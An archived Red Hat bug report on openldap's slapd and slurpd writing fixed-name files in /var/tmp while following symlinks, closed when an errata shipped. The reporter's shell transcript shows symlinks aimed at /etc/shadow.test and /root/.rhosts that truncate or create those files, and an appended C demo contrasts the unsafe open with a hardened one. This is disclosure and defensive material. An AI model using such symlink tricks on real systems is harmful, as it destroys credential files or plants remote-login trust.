Bug 10714 - Insecure file creation using static files which follow symlinks.
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: openldap (Show other bugs)
Version: 6.2
Platform: All Linux
Priority: high
Severity: medium
Assigned To: Nalin Dahyabhai
: Security
Reported: 2000-04-10 20:57 EDT by SB
Modified: 2008-05-01 11:37 EDT (History)

Doc Type: Bug Fix
Last Closed: 2000-04-24 02:41:33 EDT
Attachments: None
Description SB 2000-04-10 20:57:44 EDT
I was trying out the new openldap package (openldap-1.2.9-5) and I noticed
it blindly creates some files which follow symlinks and will overwrite any
file without notification. For example:

[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
lrwxrwxrwx    1 root     root           13 Apr 10 20:55 NEXTID -> /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap start
Starting ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap stop
Shutting down ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root            2 Apr 10 21:04 /etc/shadow.test
[root@king /]#

Apparently when slapd terminates it creates the file NEXTID in /var/tmp
(actually it follows the symlink from /usr/tmp).  It will create and
overwrite files.  slurpd has a similar problem:

[root@king /]# ls -al /root/.rhosts
ls: /root/.rhosts: No such file or directory
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
-rw-r--r--    1 root     root            0 Apr 10 20:59 slurpd.status
[root@king /]#
[root@king /]# rm /var/tmp/slurpd.status
[root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /root/.rhosts
-rw-r--r--    1 root     root            0 Apr 10 21:01 /root/.rhosts
[root@king /]#

slurpd, to my knowledge, will only create files; it will not overwrite or
truncate previously existing files.  Also, after slapd is running, if you
type slurpd, it will try to read from /var/tmp/slurpd.status, fail, and then
write to /var/tmp/slurpd.status.lock, which can be a symlink to any file you
wish to create, and truncate any existing file to 0 bytes.  There are other
instances I noticed in the code, such as /tmp/slurpd.dump and other files, that
probably behave the same. Not good.

-Stan Bubrouski
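The file-creation pattern this report describes, beside the hardened form that refuses to follow a planted symlink, as an added example in C (not code from the bug report or from openldap; the demo directory, file names and file contents are constructed for the demonstration):

```c
/* Added example, not from the bug report or from openldap: the status-file
 * creation this report describes, beside a hardened form. Paths are constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* What the report observed: a create-with-truncate open follows a symlink
 * planted in a world-writable directory and truncates whatever it points at. */
static int unsafe_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}
/* Hardened form: O_EXCL refuses any pre-existing name (a symlink included, even a
 * dangling one) and O_NOFOLLOW refuses a symlink as the final path component. */
static int safe_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}
static long file_size(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}
/* Rebuilds the report's scenario in a private temp dir; returns 0 when the hardened
 * open leaves the target intact while the original pattern truncates it. */
int run_demo(void) {
    char dir[] = "/tmp/nextid-demo.XXXXXX";   /* constructed demo directory */
    if (mkdtemp(dir) == NULL) return 1;
    char target[256], link[256], fresh[256];
    snprintf(target, sizeof target, "%s/shadow.test", dir);  /* stand-in victim file */
    snprintf(link, sizeof link, "%s/NEXTID", dir);           /* the planted symlink */
    snprintf(fresh, sizeof fresh, "%s/NEXTID.fresh", dir);   /* a name nobody planted */
    FILE *f = fopen(target, "w");
    if (f == NULL) return 2;
    fputs("secret\n", f);                        /* 7 bytes that must survive */
    fclose(f);
    if (symlink(target, link) != 0) return 3;
    int rc = 0;
    int fd = safe_create(link);                  /* must refuse the symlink */
    if (fd != -1) { close(fd); rc |= 4; } else if (errno != EEXIST && errno != ELOOP) rc |= 4;
    if (file_size(target) != 7) rc |= 8;         /* target untouched */
    fd = safe_create(fresh);                     /* a fresh name is created normally */
    if (fd == -1) rc |= 16; else close(fd);
    fd = unsafe_create(link);                    /* the behaviour the report shows */
    if (fd != -1) close(fd);
    if (file_size(target) != 0) rc |= 32;        /* truncated through the link */
    unlink(fresh); unlink(link); unlink(target); rmdir(dir);
    return rc;
}
```

On current Linux kernels, fs.protected_symlinks=1 also refuses to follow a symlink in a sticky world-writable directory such as /var/tmp when the link's owner differs from the caller; the demo uses a private directory so that sysctl does not mask the comparison.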
Comment 1 Cristian Gafton 2000-04-24 02:41:59 EDT
Errata released that fixes the problem.
